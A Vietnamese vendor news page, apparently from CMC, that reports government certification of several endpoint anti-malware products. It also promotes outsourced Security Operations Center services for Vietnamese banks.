Đầu năm nay, Bộ TT&TT đã đánh giá và công nhận 2 sản phẩm phòng, chống phần mềm độc hại đáp ứng yêu cầu kỹ thuật theo Chỉ thị 14 của Thủ tướng Chính phủ, gồm: giải pháp tổng thể phòng chống virus cho các cơ quan, doanh nghiệp Bkav Endpoint AI của Công ty cổ phần phần mềm diệt virus Bkav; giải pháp phát hiện, chống tấn công có chủ đích lớp Endpoint (Viettel Endpoint Detection & Response – VEDR) của Công ty An ninh mạng Viettel thuộc Tập đoàn Viettel.

Sản phẩm phòng chống mã độc của Viettel, Bkav, CMC và Veramine đã được Bộ TT&TT đánh giá và cấp chứng nhận đáp ứng yêu cầu kỹ thuật theo Chỉ thị 14 là những sản phẩm, giải pháp thỏa mãn các tiêu chí đã được nêu rõ tại Chỉ thị 14 của Thủ tướng Chính phủ về việc nâng cao năng lực phòng, chống phần mềm độc hại, đó là: có chức năng cho phép quản trị tập trung; có dịch vụ, giải pháp hỗ trợ kỹ thuật 24/7, có khả năng phản ứng kịp thời trong việc phát hiện, phân tích, gỡ bỏ phần mềm độc hại; có thể chia sẻ thông tin, dữ liệu thống kê tình hình lây nhiễm mã độc với hệ thống kỹ thuật của cơ quan chức năng có thẩm quyền, tuân thủ theo tiêu chuẩn, quy chuẩn kỹ thuật, hướng dẫn nghiệp vụ của Bộ TT&TT.

Với CMC Malware Detection and Defense, một trong 2 sản phẩm phòng, chống mã độc mới được bổ sung vào Danh mục, CMC cho biết, giải pháp này được phát triển trên nền tảng của CMC Internet Security Enterprise (CISE) và là giải pháp hỗ trợ các cơ quan, tổ chức phát hiện và phòng thủ trước nguy cơ tấn công mã độc triển khai trên các máy trạm với hệ thống giám sát tập trung. Cụ thể, giải pháp có các tính năng nổi bật như: làm lá chắn bảo vệ các máy tính cá nhân an toàn khỏi các nguy cơ tấn công từ mã độc; giám sát các hoạt động bất thường có thể gây ra nguy hại trên các máy tính; phát hiện các lỗ hổng, các phần mềm độc hại và các kết nối nguy hiểm.

Đồng thời, hệ thống giám sát chủ động từ phía CMC Cyber Security cho phép xác định và khoanh vùng ngay các nguy cơ cho khách hàng; dịch vụ hỗ trợ, ứng cứu giảm thiểu các rủi ro cho khách hàng khi xảy ra các cuộc tấn công; cung cấp các báo cáo về tình trạng an ninh an toàn thông tin cho khách hàng nhanh chóng, kịp thời và đầy đủ.

Còn với bộ giải pháp Veramine Advanced Endpoint Security Suite (VAESS) của Công ty Veramine, thông tin từ Cyberlab – đơn vị phân phối bộ giải pháp này tại Việt Nam cho hay, VAESS có khả năng thu thập thông tin đa dạng từ mức nhân hệ điều hành đến các phiên làm việc của người dùng để xác định mọi hành vi đáng ngờ trên các điểm cuối.

Bộ giải pháp này cũng sử dụng nhiều cơ chế linh hoạt để ứng phó với các hành vi bất thường đã phát hiện được như ngắt, tạm dừng các tiến trình, phiên làm việc hay cách ly một điểm cuối, một tiến trình khỏi kết nối mạng; thực hiện việc phòng thủ chủ động bằng cách tạo ra một hệ thống bẫy đối với mã độc và các tin tặc trên các điểm cuối nhằm mục đích theo dõi và ngăn chặn các hoạt động của tin tặc, mã độc trên các điểm cuối này.

Bên cạnh đó, VAESS đảm bảo khả năng cung cấp đầy đủ các bằng chứng trong quá trình điều tra số (forensics), cũng như bổ sung các tính năng nâng cao khác để chống lại các mối đe dọa từ nội bộ như quản lý người dùng, dữ liệu và thiết bị ngoại vi.

Đặc biệt, VAESS hỗ trợ đa dạng các nền tảng khác nhau trong đó bao gồm các phiên bản hệ điều hành Windows, các bản phân phối Linux và sẽ sớm được hỗ trợ trên hệ điều hành MacOS.

Giải bài toán xây dựng Trung tâm điều hành An ninh mạng cho khối Ngân hàng
10 Th9

Giải bài toán xây dựng Trung tâm điều hành An ninh mạng cho khối Ngân hàng

Trung tâm điều hành An ninh mạng (SOC) là một khái niệm “không lạ nhưng vẫn còn mới” với các cơ quan, tổ chức tại Việt Nam đặc biệt là khối Ngân hàng. Vậy đâu là hướng tiếp cận xây dựng SOC hiệu quả, phù hợp với tiến trình phát triển số hóa của các Ngân hàng Việt?
Trung tâm điều hành an ninh mạng (SOC) – “không lạ nhưng vẫn còn mới”

Tại các quốc gia phát triển trong khu vực như: Nhật Bản, Singapore, Hongkong…việc xây dựng và vận hành SOC nhằm kiểm soát toàn diện và nâng cao khả năng phòng thủ cho hệ thống CNTT của các tổ chức đã được chú trọng đầu tư từ năm 2004. Đến nay, SOC đã trở thành bộ phận không thể tách rời trong mọi hoạt động của các tổ chức Chính phủ, tập đoàn đa quốc gia và các ngân hàng lớn. Theo báo cáo của Gartner, tính đến hết 2019, sẽ có khoảng 50% các tập đoàn lớn của Châu Á thực hiện các hoạt động quản trị ATTT thông qua SOC.

Nắm bắt được xu thế và nhu cầu tất yếu này, từ khoảng 2 năm trở lại đây, các ngân hàng Việt đã có kế hoạch phát triển SOC. Tuy nhiên, việc “không lạ” với khái niệm SOC chưa thể khẳng định ngân hàng “đã quen” và nắm rõ cách thức vận hành của một SOC hoàn chỉnh. Thực tế triển khai, các ngân hàng gặp phải một số vấn đề vướng mắc.

Thứ nhất, về công nghệ, một số ngân hàng bước đầu đã đầu tư hệ thống giám sát an toàn mạng (SIEM) và mua các thiết bị, công nghệ từ nhiều hãng khác nhau dẫn đến việc quản trị vận hành SOC không tập trung và thiếu đồng bộ. Việc liên tục cập nhật các phương thức và công nghệ tấn công mới cũng là một thử thách với các đơn vị không chuyên về ATTT. Thứ hai, về nhân lực, hiện tại các ngân hàng đã bắt đầu chú trọng vào nhân sự chuyên trách, tuy nhiên, gặp nhiều khó khăn trong khâu đào tạo và giữ nguồn nhân lực chất lượng cao. Thứ ba, kinh phí đầu tư quá lớn. Ước tính, chi phí đầu tư bao gồm giải pháp SIEM, Forensis, Log/Backup, các thiết bị phần cứng và theo dõi phục vụ điều tra số vào khoảng 1,300,000 USD. Chi phí này chưa bao gồm chi phí vận hành, xử lý sự cố và nhân sự quản lý hàng năm.

Thuê ngoài dịch vụ SOC – Hiệu quả thời gian, tiết kiệm chi phí, tối ưu nguồn lực

Theo ông Hà Thế Phương, Phó Tổng Giám đốc CMC InfoSec – đơn vị xây dựng và phát triển CMC NextGen SOC chia sẻ, khi phân tích cấp độ phát triển của SOC, các chuyên gia sẽ phân thành 6 cấp độ. Cụ thể: Cấp độ 1 – có nhân sự thuộc bộ phân IT hoặc phần mềm theo dõi tình trạng ANATTT; Cấp độ 2 – tích hợp 1 phần trong Trung tâm điều hành mạng (NOC); Cấp độ 3 – đã có SOC, có công nghệ và việc vận hành báo cáo đã tách ra khỏi bộ phận IT; Cấp độ 4 – giải được bài toán về nguồn lực (phát triển, phân tích, xử lý sự cố); Cấp độ 5 – kiểm soát được các mối đe dọa đã được định danh; Cấp độ 6 – kết hợp phòng ngừa, giám sát, phát hiện, phản ứng nhanh và liên tục cải tiến.

Ở Việt Nam, đạt đến cấp độ 5 hiện có CMC NextGen SOC. Ngoài việc kiểm soát được các mối đe dọa đã được định danh, trung tâm này của CMC còn tích hợp trí tuệ nhân tạo (AI), công nghệ Automation đầu tiên tại Việt Nam và có các đối tác hỗ trợ trong việc chống lại các mối nguy hiểm mới; có đội ngũ DevOps và tư vấn đáp ứng các nhu cầu đặc biệt từ phía các tổ chức, ngân hàng.

Cho nên, phương án hợp lý nhất cho các ngân hàng tại thời điểm này là thuê ngoài trọn gói dịch vụ SOC (SOC- As- a-Service) hoặc nếu đã có hệ thống SIEM thì nên hợp tác cùng một nhà cung cấp dịch vụ SOC khác (Hybrid) tư vấn – triển khai về quy trình và nhân lực quản lý thay vì tự phát triển một SOC nội bộ (In-house SOC). Trường hợp kết hợp (Hybrid), khi ngân hàng đã đầu tư hệ thống công nghệ, nhà cung cấp dịch vụ SOC có thể tích hợp thêm các giải pháp của mình vào đảm bảo vận hành tương thích, đưa ra các quy trình xử lý sự cố chuẩn và cung cấp nguồn lực… Song, tối ưu nhất vẫn là việc lựa chọn thuê ngoài trọn gói dịch vụ SOC. Khi đó, ngân hàng được chọn một nhà cung cấp dịch vụ toàn diện và phù hợp nhất, có sẵn công nghệ, chuyên gia, nhân sự chuyên trách…đồng thời giải được bài toán về chi phí đầu tư khi giảm được từ 6 đến 12 lần so với chi phí tự phát triển hệ thống và giảm thiểu tối đa các rủi ro khi quản trị hệ thống tập trung hơn.

Dựa trên thực tế tư vấn và triển khai cho thuê ngoài dịch vụ SOC tới các ngân hàng, ông Phương cho hay: “Việc thuê ngoài dịch vụ SOC hoàn toàn phù hợp với xu thế chuyển dịch từ chi phí đầu tư sang chi phí vận hành của các ngân hàng muốn xây dựng hệ thống phòng thủ bền vững. Không những thế, các ngân hàng sẽ không gặp khó khăn về nguồn lực bảo mật khi chỉ cần một đầu mối kết hợp với mô hình báo cáo, xử lý sự cố của nhà cung cấp dịch vụ và vẫn có thể giám sát 24/7”.